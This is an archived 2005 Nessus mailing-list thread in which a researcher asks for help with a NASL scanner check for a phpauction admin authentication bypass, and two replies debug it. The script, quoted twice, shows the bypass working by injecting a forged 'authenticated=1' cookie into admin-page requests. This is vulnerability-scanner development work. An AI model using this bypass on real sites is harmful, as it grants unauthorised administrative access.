Advanced
Mailing List Archive

Mailing List Archive

  1. Home >
  2. Nessus>
  3. plugins
to dumb to write the nasl..
tglemser at tele-consulting
Jul 15, 2005, 12:59 AM
Post #1 of 3 (536 views)
Permalink
.. I tried to write a nasl for a bug in phpauction I found early this
year (http://www.securityfocus.com/bid/12069), but the nasl doesn't work
completely.

I sniffed the connection while executing the script and the script
successfully uses the bypass possibility, moves to every given
directory, but sadly the script doesn't recognize, that it successfully
logged in.

Maybe some of you guys would be so kind to have a look at it? Thanks in
advance.

Toby

# The script code starts here
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

dirs = make_list( "/phpauction/admin", "/admin", "/auction/admin",
"auktion/admin", cgi_dirs());

foreach dir (dirs)
{
req = http_get(item:dir +"/admin.php", port:port);
res = http_keepalive_send_recv(port:port, data:req);
if( res == NULL ) exit(0);

if( "Passwort " >< res || "Password" >< res )
{
idx = stridx(req, string("\r\n\r\n"));
req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
res = http_keepalive_send_recv(port:port, data:req);
if("Installation" >< res)
{
security_hole(port);
}
exit(0);
}
}
# eof
Re: to dumb to write the nasl.. [ In reply to ]
theall at tenablesecurity
Jul 15, 2005, 5:53 AM
Post #2 of 3 (539 views)
Permalink
On Fri, Jul 15, 2005 at 09:59:08AM +0200, Tobias Glemser wrote:

> .. I tried to write a nasl for a bug in phpauction I found early this
> year (http://www.securityfocus.com/bid/12069), but the nasl doesn't work
> completely.
>
> I sniffed the connection while executing the script and the script
> successfully uses the bypass possibility, moves to every given
> directory, but sadly the script doesn't recognize, that it successfully
> logged in.
>
> Maybe some of you guys would be so kind to have a look at it? Thanks in
> advance.

From strictly a NASL point of view, it looks ok to me. You may want to
add a statement to print results returned by the script; eg,

display("res='", res, "'.\n");

after http_keepalive() statements. If you're running through Nessus,
output will appear in nesssud.dump.

Oh, are you sure the target(s) you're testing are indeed vulnerable to this?


George
--
theall@tenablesecurity.com
Re: to dumb to write the nasl.. [ In reply to ]
Dennis.Jackson at ndirect
Jul 15, 2005, 12:49 PM
Post #3 of 3 (532 views)
Permalink
At 9:59 +0200 15/7/2005, Tobias Glemser wrote:
>.. I tried to write a nasl for a bug in phpauction I found early this
>year (http://www.securityfocus.com/bid/12069), but the nasl doesn't
>work completely.
>
>I sniffed the connection while executing the script and the script
>successfully uses the bypass possibility, moves to every given
>directory, but sadly the script doesn't recognize, that it
>successfully logged in.
>
>Maybe some of you guys would be so kind to have a look at it?
>
>Thanks in advance.
>
>Toby
>
># The script code starts here
>include("http_func.inc");
>include("http_keepalive.inc");
>
>
>port = get_http_port(default:80);
>if(!get_port_state(port))exit(0);
>
>dirs = make_list( "/phpauction/admin", "/admin", "/auction/admin", "auktion/admin", cgi_dirs());
>
>foreach dir (dirs)
>{
> req = http_get(item:dir +"/admin.php", port:port);
> res = http_keepalive_send_recv(port:port, data:req);
> if( res == NULL ) exit(0);
>
> if( "Passwort " >< res || "Password" >< res )
> {
> idx = stridx(req, string("\r\n\r\n"));
> req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
> res = http_keepalive_send_recv(port:port, data:req);
> if("Installation" >< res)
> {
> security_hole(port);
> }
> exit(0);
> }
>}
># eof


There are some errors in this script.

(1) The final explicit directory in the list doesn't have a
leading / Without this the web server will respond with a
400 Bad Request

(2) The second exit(0) should be inside the if("Installation" >< res)
That is, after the security_hole(port)

(3) Did you mean to include a tab character after Passwort
rather than a space?


Without a vulnerable web server to test against, it's difficult
to know whether there are logic errors.



Dennis.

©2024 GT.net. A Gossamer Threads company.
5th Floor, 455 Granville St., Vancouver, BC V6C 1T1, Canada | Legal